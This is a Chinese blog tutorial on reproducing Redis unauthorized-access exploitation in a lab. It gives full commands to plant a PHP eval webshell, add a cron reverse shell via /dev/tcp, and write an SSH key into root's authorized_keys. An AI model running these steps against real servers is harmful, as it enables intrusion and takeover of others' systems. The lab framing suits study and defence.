redis未授权访问漏洞(三种方法)

已于 2023-09-20 10:42:00 修改
阅读量3.9k 收藏 12
点赞数 3
分类专栏: 漏洞复现 文章标签: redis 网络安全 linux
于 2023-08-30 16:07:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52244272/article/details/132569455
版权

声明:此文章仅用于学习使用

漏洞简介:

        redis 默认情况下,绑定在 0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则避免其他非信任来源 ip 访问等,会将 redis 服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 redis 以及读取 redis 的数据。攻击者在未授权访问 redis 的情况下,利用 redis 自身的提供的config 命令,可以进行写文件操作,从而可以将自己编写生成的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而使用对应私钥通过ssh服务登录目标服务器。

环境准备:centos7.6(靶机)、kali

影响版本:redis 2.x,3.x,4.x,5.x

目录

一、环境搭建

二、启动环境

三、漏洞利用

1.方法一:写入webshell

1.1 连接redis

1.1.1 相关报错 

1.2 获取getshell

2.方法二:Linux计划任务反弹shell

3.方法三:写入ssh公钥实现ssh登录

一、环境搭建

🌂首先在centos及kali中各自下载redis源码包

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

🌂解压源码包,可以不加v,隐藏显示详细信息

tar -zxvf redis-2.8.17.tar.gz 

🌂进入解压后的目录,并创建makefile

1)cd redis-2.8.17/

2)make

🌂centos靶机进入src目录,复制客户端与服务端文件至环境变量目录;返回上级目录复制相关配置文件至/etc下

1)cp redis-server /usr/bin

2)cp redis-cli /usr/bin

3)cp redis.conf /etc

二、启动环境

🌂在靶机新开一个终端,启动redis

redis-server /etc/redis.conf

🌂 kali中验证可以成功连接

./redis-cli -h 靶机ip

🌂 kali使用nmap扫描验证

nmap -p 6379 --script redis-info 靶机ip

三、漏洞利用

1.方法一:写入webshell

1.1 连接redis

🌂连接redis,端口默认为6379

redis-cli -h 靶机ip -p 6379

1.1.1 相关报错 

到这里跟着复现,发现报"(错误)ERR客户端发送了AUTH,但未设置密码"

正常来讲,redis2.8.17默认无密码,因此才会造成我们未授权访问。

如果做未授权访问复现,请忽略以下步骤!!!!!

此处可以使用命令设置一个简单的数字密码,并再次尝试登录,发现可以正常执行

1)config set requirepass 123456

2)auth 123456

ps:flushall                   # 清理缓存,执行后可重新设置密码

🌂接下来继续执行命令,成功进入redis

config get dir

1.2 获取getshell

🌂在/var目录下创建目录,并在redis输入命令

1)mkdir -p /var/www/html/                        # 在非进入redis服务器的终端执行

2)config set dir /var/www/html/                # 设置webshell的存储目录

3)config set dbfilename system.php        # 设置webshell的文件名

4)set shell "\r\n\r\n<?php @eval($_POST[cmd]);?>\r\n\r\n"        # 将一句话木马写入system.php文件中

5)save                                                        # 保存

🌂进入/var/www/html目录下,查看并验证是否执行成功

🌂通过蚁剑或冰蝎等工具连接,此处本机没有搭建php环境,不做演示。小伙伴可在centos自行安装phpstudy方便后续蚁剑等工具连接。

2.方法二:Linux计划任务反弹shell

🌂centos中位置为/var/spool/cron/root,通常没有root文件,因此创建

原理:利用redis数据库备份功能,在不知情网站绝对路径时,利用定时任务检测/etc/crontab内容,将反弹shell的命令使用redis备份到/etc/crontab中,获取反弹shell

1)config set dir /var/spool/cron

2)config set dbfilename root

3)set abc "\n\n\n* * * * * bash -i >& /dev/tcp/靶机ip/6666 0>&1\n\n\n"          # 端口号可自行设定

4)save

🌂新开终端,监听6666端口,等待建立连接,成功获取到shell,可以执行命令

nc -lvp 6666

3.方法三:写入ssh公钥实现ssh登录

🌂在kali生成ssh公钥、私钥,密码为空

ssh-keygen -t rsa

🌂 进入/root/.ssh并将公钥写入key.txt文件

(echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt        

🌂将key.txt文件传入redis靶机

cat key.txt| redis-cli -h 靶机ip -x set pub

🌂将redis文件路径设为/root/.ssh,文件名为authorized_keys,并save保存

1)./redis-cli -h 靶机ip

2)config get dir

3)config set dir /root/.ssh

4)config set dbfilename authorized_keys

5)config get dbfilename

6)save

🌂kali使用ssh免密登录centos靶机

ssh -i id_rsa root@靶机ip

至此,三种复现方法结束~

学习的小白_
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
centos7.6离线安装nginx
11-18
centos7.6离线安装nginx
redis授权访问利用汇总
今天是几号的博客
03-17 955
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 1085
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4545
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
redis_授权访问
scu_hacker博客
01-13 7674
本文介绍redis授权访问的4种利用方式
redis授权getshell四种方式
BING
04-24 3322
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
redis 授权访问漏洞
weixin_60719780的博客
03-02 2057
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问
weixin_63960760的博客
08-29 926
redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 2797
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
redis授权访问
Cfoxer的博客
08-08 2212
redis授权访问,一句话木马写入getshell,Redis授权写SSH公钥获得shell,Redis授权写定时任务反弹shell
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
被动式漏洞扫描系统.zip
03-08
Gourdscan v2.1 被动式漏洞扫描系统 Passive Vulnerability Scan 为避免 Gourdscan 被恶意利用,开源版本只放出了简单的探测规则,无法用作为黑客入侵工具。请使用者遵守《中华人民共和国网络安全法》,勿将 Gourdscan 用于授权的测试,参与项目的社区成员/YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。 安装依赖: Linux 安装 Redis apt-get install redis-server 或从源码编译安装 wget http://download.redis.io/redis-stable.tar.gz && tar xzf redis-stable.tar.gz && cd redis-stable && make && make install 系统已有 Redis 的,运行 redis-server --version 查看自己的版本,需注意2.x版本的 Redis 会有问题 安转 python 类库 基础模块 安装pip wget https://sec.ly.com/mirror/get-pip.py --no-check-certificate && python get-pip.py -i https://mirrors.aliyun.com/pypi/simple/ $ pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 其他事项 以下如果有报错便可以安装,一般不需要安装 镜像: https://sec.ly.com/mirror/libdnet-libdnet-1.12.tar.gz https://sec.ly.com/mirror/pylibpcap-0.6.4.tar.gz $ wget https://github.com/dugsong/libdnet/archive/master.zip && unzip master.zip $ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz && tar zxf pylibpcap-0.6.4.tar.gz Windows 下载 Redis https://sec.ly.com/mirror/Redis-x64-3.2.100.zip 启动 Redis redis-server.exe GourdScan路径\conf\redis.conf 如需使用网卡抓包方式,同程src已有各依赖镜像,可以把exe文件都装上 https://sec.ly.com/mirror/dnet-1.12.win32-py2.7.exe https://sec.ly.com/mirror/dpkt-1.7.win32.exe https://sec.ly.com/mirror/pcap-1.1.win32-py2.7.exe https://sec.ly.com/mirror/WinPcap_4_1_3.exe OSX 安装 homebrew /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 安装 redis brew install redis 启动 redis redis-server conf/redis.conf 安装依赖 pip install pcapy -i https://pypi.doubanio.com/simple/ git clone https://github.com/dugsong/libdnet.git && cd libdnet && ./configure && make && cd python && python setup.py install 使用方法redis-server conf/redis.conf python gourdscan.py conf.json 默认平台用户名密码为:admin:Y3rc_admin 默认redis密码为:Y3rc_Alw4ys_B3_W1th_Y0u 如果有勾选sqlmap api scan选项,请在服务器上开启sqlmap api。 一切正常的话你就可以在8000端口上访问到 GourdScanV2 的 web 界面了 Start Monitor 中提供了三种代理方式,区别的话在下方文档有
redis常见使用场景
qq_38341582的博客
04-23 280
redis场景使用场景
使用Redis实现延时队列
weixin_43675252的博客
04-25 280
延时队列相比于普通队列最大的区别就体现在其延时的属性上,普通队列的元素是先进先出,按入队顺序进行处理,而延时队列中的元素在入队时会指定一个延迟时间,表示其希望能够在经过该指定时间后处理。从某种意义上来讲,延迟队列的结构并不像一个队列,而更像是一种以时间为权重的有序堆结构。可以看到生产者很简单,其实就是利用zset的特性,给一个zset添加元素而已,而时间就是它的score。消费者的代码也不难,就是把已经过期的zset中的元素给删除掉,然后处理数据。redis的zset实现延迟队列。
Redis 开发】分布式锁中的常见问题和Lua脚本
最新发布
weixin_62513677的博客
04-26 330
分布式锁中我们设置的过期时间:如果有一个线程获取锁之后在进行操作时,到达了锁的过期时间,之后就会有别的线程获得锁,如果这时,第一个线程执行完成后释放锁,就会将第二个锁的线程删除改进分布式锁添加释放锁的判断上述我们做了修改进行判断,但是还存在一种极端情况,当线程操作完毕需要释放锁的时候,这个时候已经判断完毕,但是由于比如说垃圾回收等问题对线程的释放操作进行阻塞,这个时候如果超过等待时间,这是还是会出现上述问题,在阻塞结束之后,会删除其他线程的锁。
SpringBoot---------整合Redis
qq_62366797的博客
04-26 670
了解学习SpringBoot整合Redis
Redis授权漏洞的危害
04-04
Redis授权漏洞的危害包括但不限于以下几点: 1. 数据泄露:攻击者可以通过访问Redis授权的服务,获取到Redis中存储的敏感数据,例如用户密码、数据库信息、业务数据等。 2. 数据篡改:攻击者可以通过访问Redis授权的服务,对Redis中存储的数据进行篡改,导致业务数据的丢失或者损坏。 3. 服务拒绝:攻击者可以通过访问Redis授权的服务,对Redis进行拒绝服务攻击,导致服务不可用,影响业务正常运行。 4. 系统入侵:攻击者可以通过访问Redis授权的服务,获取到服务器的权限,从而进一步入侵系统,导致更严重的安全问题。 因此,及时发现和修复Redis授权漏洞,对于保障系统的安全和稳定运行至关重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学习的小白_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值